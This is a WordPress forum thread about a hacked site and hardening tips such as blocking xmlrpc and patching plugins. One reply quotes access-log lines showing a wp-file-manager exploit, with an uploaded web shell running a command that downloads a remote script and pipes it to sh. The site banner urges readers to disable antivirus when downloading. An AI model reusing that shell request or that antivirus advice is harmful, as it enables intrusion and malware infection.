• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Please Help!! I lost hope in WordPress!

in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
 
  • Like
  • Love
Reactions: Eddie147, smalok, underwater and 2 others
themadoxter said:
I don't even know the duplicator pro was used for this (hacking) but yes, i'm using wordfence, loginizer, 2 step login, virus total, google recaptcha and i change my admin url, daily backups, lock anyone who try to use "admin" word and variations and so on.
Click to expand...

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
 
  • Love
  • Like
Reactions: Eddie147, Fat_Thor and Mr G
themadoxter said:
I don't even know the duplicator pro was used for this (hacking) but yes, i'm using wordfence, loginizer, 2 step login, virus total, google recaptcha and i change my admin url, daily backups, lock anyone who try to use "admin" word and variations and so on.
Click to expand...
Duplicator pro is vulnerable to hacking? OMG...many people suggest this plugin. However, I use Updraftplus. Hope Updraftplus is better.
 
  • Like
Reactions: Eddie147
KarmaticOne said:
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Click to expand...
You're so polite, Babiato needs a "MVM" member badge. (most valuable member)
 
  • Love
  • Like
Reactions: Eddie147 and KarmaticOne
Scorp said:
What do you all think about file manager plugin in wordpress? Which let us edit any file from wordpress rather than accessing cpanel and editing it.
Click to expand...

Let me answer to this in some less common way:

Code: 
[19/Dec/2020:08:57:08 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
[19/Dec/2020:08:57:48 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1" 200 411

I personally don't trust that plugin as it had critical flaws in the last major releases
 
  • Like
  • Love
Reactions: smalok, Scorp and KarmaticOne
slvrsteele said:
in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
Click to expand...

This is sooo important it should almost be pinned. I completely block xmlrpc. Thank you for pointing this simple yet crucial step.
 
  • Like
Reactions: Eddie147 and smalok
KarmaticOne said:
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Click to expand...
Changing wp admin url is more likely to he hack says wordfence
 
yes, there is a news comes from wordfence recently which says elementor free version has some problem and it affected 7M website worldwide, maybe this is what you are facing. Check wordfence blog for this and immediately either remove elementor oor update it. Elementor causing this issue maybe. Check it
 
imraxstar said:
yes, there is a news comes from wordfence recently which says elementor free version has some problem and it affected 7M website worldwide, maybe this is what you are facing. Check wordfence blog for this and immediately either remove elementor oor update it. Elementor causing this issue maybe. Check it
Click to expand...
Since he says all of his websites are affected, I doubt it's Elementor, cause the vulnerability only exists when people have access to the editor. From the Wordfence blog (comments section):

"this can only be exploited by users that can access the Elementor editor. If the only users on the site are those that are already allowed to add unfiltered HTML or JavaScript, such as administrators or editors, then yes, this doesn't add any additional risk. The primary risk is for sites that have users with fewer privileges, such as contributors and authors, as this creates a larger attack surface."

Still, given the huge user base of Elementor, it's a big thing...
 
  • Like
Reactions: KarmaticOne and Eddie147
slvrsteele said:
in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
Click to expand...
Hi @slvrsteele , could you please explain the real steps to do what you suggest in simple language. I feel that your tip is important but I do not understand how to really apply it. Thank you in advance.
 
KarmaticOne said:
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Click to expand...
That's true
 
You must log in or register to reply here.

Similar threads

B
[Help Me Please] GDrive The download quota for this file has been exceeded
Replies
0
Views
206
General Discussion
Bimoldas
B
babumon
please help to connect Two Wp Plugins
Replies
0
Views
330
General Discussion
babumon
babumon
sanjid90
Help Please!! Server Configuration for E-commerce!?
Replies
4
Views
379
General Discussion
mzak
M
nakinakodada
Please Anyone help to Install Xenforo dark theme
Replies
0
Views
347
General Discussion
nakinakodada
nakinakodada
buiga
Hi all , please help me check name template of: thttps://apkadmin.com/
Replies
0
Views
316
General Discussion
buiga
buiga

Latest posts

Forum statistics

Threads
79,479
Messages
1,143,347
Members
248,849
Latest member
kmoney

Share this page

Share this page
Top Bottom
Back
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock